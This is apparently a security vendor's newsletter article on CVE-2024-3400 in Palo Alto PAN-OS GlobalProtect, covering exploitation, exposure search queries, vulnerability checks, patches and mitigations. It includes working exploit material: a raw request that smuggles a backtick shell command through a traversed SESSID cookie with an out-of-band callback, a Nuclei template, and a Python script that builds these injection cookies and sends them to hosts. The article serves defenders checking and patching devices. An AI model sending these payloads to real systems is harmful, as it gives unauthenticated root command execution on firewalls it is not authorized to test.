Analysis of CVE-2024-3400 in Palo Alto Firewalls: Initial Access and Exploitation
Francesco Cipollone
Reduce risk - focus on vulnerabilities that matter - Contextual ASPM - CEO & Founder - Phoenix Security - Runner - Application Security, Cloud Security | 40 under 40 | CSA UK Board | CSCP Podcast Host
Welcome back to Phoenix Security | ASPM newsletter
On April 10, 2024, a research group identified zero-day exploitation of a vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS at one of its network security monitoring (NSM) customers; CISA has since added the vulnerability to its Known Exploited Vulnerabilities (KEV) catalog. This article covers the details of CVE-2024-3400 and how to track remediation.
(Note: some parts of this article are AI-generated from Phoenix Security content to accelerate the response to this vulnerability.)
The threat actor, tracked as UTA0218, exploited the vulnerability to run commands remotely on the firewall, establish a reverse shell, and download further tools onto the device. A compromised firewall of this kind is an entry point for further exploitation and movement into the network.
Exploitation of CVE-2024-3400: What You Need to Know
CVE-2024-3400 is a zero-day vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS firewalls, unpatched at the time of discovery. It affects PAN-OS 10.2, 11.0 and 11.1 on devices with a GlobalProtect gateway or portal configured, and it allows an unauthenticated attacker to run arbitrary commands on the firewall as root. That is how threat actors such as UTA0218 obtained reverse shells and, more alarmingly, laid the groundwork for deeper network penetration.
With patches slated for release by April 14, 2024, the race against time is critical. For detailed insights into the nature of CVE-2024-3400 and remediation strategies, see this article.
Distribution
To track the exposed population, these are the search queries to use (thanks, Daniel Card):
Shodan (41,662): http.html_hash:-1303565546
Censys (41,163): services.http.response.body_hash="sha1:28f1cf539f855fff3400f6199f8912908f51e1e1"
Current distribution might include several honeypots.
According to The Shadowserver Foundation, there is evidence of exploitation in the wild.
Timeline for exploitation
See the following for full details: https://dashboard.shadowserver.org/statistics/iot-devices/map/?day=2024-04-15&vendor=palo+alto+networks&model=globalprotect&geo=all&data_set=count&scale=log
Check for vulnerability:
You can use Burp Collaborator for an out-of-band RCE check. The SESSID cookie value is used by the portal as a file name, so the traversal creates an empty file in the device telemetry directory whose name contains a backtick-wrapped shell command; when device telemetry later processes that directory through a shell, the command executes as root and the callback to Collaborator confirms execution. Replace burpcollaborator.net with your own Collaborator subdomain, and keep the command to a harmless probe (a curl or DNS lookup to your Collaborator host): anything inside the backticks runs as root on a production firewall.
POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: 127.0.0.1
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`hostname${IFS}burpcollaborator.net `;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
The following Nuclei template performs a non-destructive version of the check. The first request uses the same traversal to create an empty file named poc.txt in the directory the GlobalProtect portal serves as /global-protect/portal/images/; the second request fetches it. A 403 means the file exists but the web server cannot read it (it was created as root), so the device is vulnerable; a 404 means it was not created. Pass the target as {{BaseURL}} (nuclei -u https://<host>), and note that the empty poc.txt file is left on the device.
id: palo-alto-networks-pan-os-command-injection

info:
  name: Palo Alto Networks PAN-OS Command Injection Vulnerability
  author: generated with pdteam AI
  severity: critical

http:
  - method: POST
    path:
      - "{{BaseURL}}/ssl-vpn/hipreport.esp"
    headers:
      Cookie: "SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/poc.txt;"
      Connection: "close"
      Content-Type: "application/x-www-form-urlencoded"
      Content-Length: "0"
    matchers:
      - type: status
        status:
          - 200

  - method: GET
    path:
      - "{{BaseURL}}/global-protect/portal/images/poc.txt"
    matchers:
      - type: status
        status:
          - 403
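As an added example (this is not Phoenix Security's code nor the Nuclei template above), here is the same two-request check in Python, so that a practitioner can run it against a list of hosts and read a verdict without a scanner. It builds the SESSID cookie for both variants shown on this page (the out-of-band command variant and the poc.txt file-creation variant), classifies the response pair, and takes an injectable transport so the logic can be exercised offline. The function names, the use of curl as the out-of-band probe, the constructed canned responses and the host name fw.example.test are assumptions for illustration.

```python
"""Two-request check for CVE-2024-3400 (added example, not Phoenix Security's code).

The names, the fake transport and the canned responses below are assumptions
made for illustration; only the paths and cookie shape come from the page.
"""
import ssl
import sys
import http.client
from typing import Callable, Dict, List, Optional, Tuple

HIPREPORT = "/ssl-vpn/hipreport.esp"
# Directory served by the GlobalProtect portal as /global-protect/portal/images/
PORTAL_IMAGES_DIR = "/var/appweb/sslvpndocs/global-protect/portal/images"
# Directory whose file names device telemetry later hands to a shell
TELEMETRY_DIR = "/opt/panlogs/tmp/device_telemetry/minute"

# (host, method, path, headers) -> HTTP status; injectable so the check runs offline
Send = Callable[[str, str, str, Dict[str, str]], int]


def build_sessid(path: str, command: Optional[str] = None) -> str:
    """Build the SESSID cookie value that the portal uses as a file name.

    '/../../..' walks out of the session directory, so the rest of the value
    becomes the absolute path of the empty file that gets created. With a
    command, the file name carries a backtick-wrapped shell command (the
    Collaborator variant on this page); ${IFS} replaces spaces, which would
    not survive the file-name context.
    """
    if command is not None:
        command = command.replace(" ", "${IFS}")
        path = f"{path}`{command}`"
    return f"/../../..{path};"


def classify(post_status: int, get_status: int) -> str:
    """Interpret the file-creation check.

    The traversal leaves an empty, root-owned file in the images directory;
    the web server answers 403 for a file it can see but cannot read, and 404
    when nothing was created.
    """
    if post_status != 200:
        return f"inconclusive: hipreport.esp returned {post_status}"
    if get_status == 403:
        return "vulnerable"
    if get_status == 404:
        return "not vulnerable"
    return f"inconclusive: probe file returned {get_status}"


def oob_headers(host: str, collaborator: str, marker: str = "hellothere226") -> Dict[str, str]:
    """Headers for the out-of-band variant: a curl callback to your Collaborator host."""
    cookie = build_sessid(f"{TELEMETRY_DIR}/{marker}", f"curl {collaborator}")
    return {"Host": host, "Cookie": f"SESSID={cookie}", "Connection": "close",
            "Content-Type": "application/x-www-form-urlencoded", "Content-Length": "0"}


def https_send(host: str, method: str, path: str, headers: Dict[str, str]) -> int:
    """Real transport: one request over TLS, returning only the status code."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE  # portals frequently present self-signed certificates
    conn = http.client.HTTPSConnection(host, 443, context=ctx, timeout=10)
    try:
        conn.request(method, path, body=b"" if method == "POST" else None, headers=headers)
        return conn.getresponse().status
    finally:
        conn.close()


def check_host(host: str, probe: str = "poc.txt", send: Send = https_send) -> str:
    """Run the non-destructive file-creation check and return a verdict string."""
    cookie = build_sessid(f"{PORTAL_IMAGES_DIR}/{probe}")
    headers = {"Host": host, "Cookie": f"SESSID={cookie}", "Connection": "close",
               "Content-Type": "application/x-www-form-urlencoded", "Content-Length": "0"}
    post_status = send(host, "POST", HIPREPORT, headers)
    get_status = send(host, "GET", f"/global-protect/portal/images/{probe}", {"Host": host})
    return classify(post_status, get_status)


def fake_send(responses: Dict[Tuple[str, str], int], log: List[Tuple[str, str, str]]) -> Send:
    """Constructed offline transport: canned statuses keyed by (method, path)."""
    def send(host: str, method: str, path: str, headers: Dict[str, str]) -> int:
        log.append((method, path, headers.get("Cookie", "")))
        return responses[(method, path)]
    return send


if __name__ == "__main__":
    if len(sys.argv) > 1:  # python3 check_3400.py fw.example.test
        print(sys.argv[1], check_host(sys.argv[1]))
    else:  # offline demonstration against constructed responses
        log: List[Tuple[str, str, str]] = []
        canned = {("POST", HIPREPORT): 200, ("GET", "/global-protect/portal/images/poc.txt"): 403}
        print(check_host("fw.example.test", send=fake_send(canned, log)), log)
```

Run it with a host name to test one device you are authorized to test; without arguments it replays constructed responses. The verdict logic treats only the 403/404 pair as decisive, so a portal that is not enabled (non-200 on hipreport.esp) or that answers something unexpected is reported as inconclusive rather than as safe.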
Patch/Fix CVE-2024-3400 for Palo Alto
Palo Alto Networks has released fixes in PAN-OS 10.2.9-h1, PAN-OS 11.0.4-h1 and PAN-OS 11.1.2-h3, and in all later PAN-OS versions.
Hotfixes for other commonly deployed maintenance releases are also being made available to address this issue; see the Palo Alto Networks advisory for the ETAs of the upcoming hotfixes.
Workarounds and Mitigation Measures
Palo Alto Networks customers with a Threat Prevention subscription can block known exploitation attempts by enabling Threat ID 95187 in the Vulnerability Protection profile applied to the GlobalProtect interface. Additional details on safeguarding the GlobalProtect interface are in the vendor's guidance.
For those unable to apply Threat Prevention mitigations, disabling device telemetry was initially recommended as a stopgap until the upgrade can be performed. Note that Palo Alto Networks later updated its advisory to state that disabling device telemetry is not an effective mitigation for CVE-2024-3400; upgrading to a fixed PAN-OS version is the only complete remediation.
Free Assessment and Remediation Guidance
To grasp the full scope of CVE-2024-3400's impact on your network and to structure a precise remediation campaign, do not hesitate to contact us for a free assessment and guidance on remediation actions.
How Phoenix Can Help
For detecting, prioritizing and scheduling the remediation of CVE-2024-3400, Phoenix Security is a strong ally. By leveraging Unified Vulnerability Management (UVM) and Application Security Posture Management (ASPM), Phoenix enables organizations to detect, prioritize and schedule comprehensive remediation campaigns. These tools not only identify affected assets but also help manage the repair process across the organization's network, offering granular insights and real-time progress tracking through intuitive dashboards.
Check the latest threats and vulnerability analysis
Stay ahead of the threat. Click here to learn how Phoenix can secure your network against CVE-2024-3400 and similar cybersecurity vulnerabilities.
Comments

Francesco Cipollone, 10 months ago: Exploitation of the Palo Alto continues; 152K appliances discovered.

Francesco Cipollone, 11 months ago: Update: fixes just released.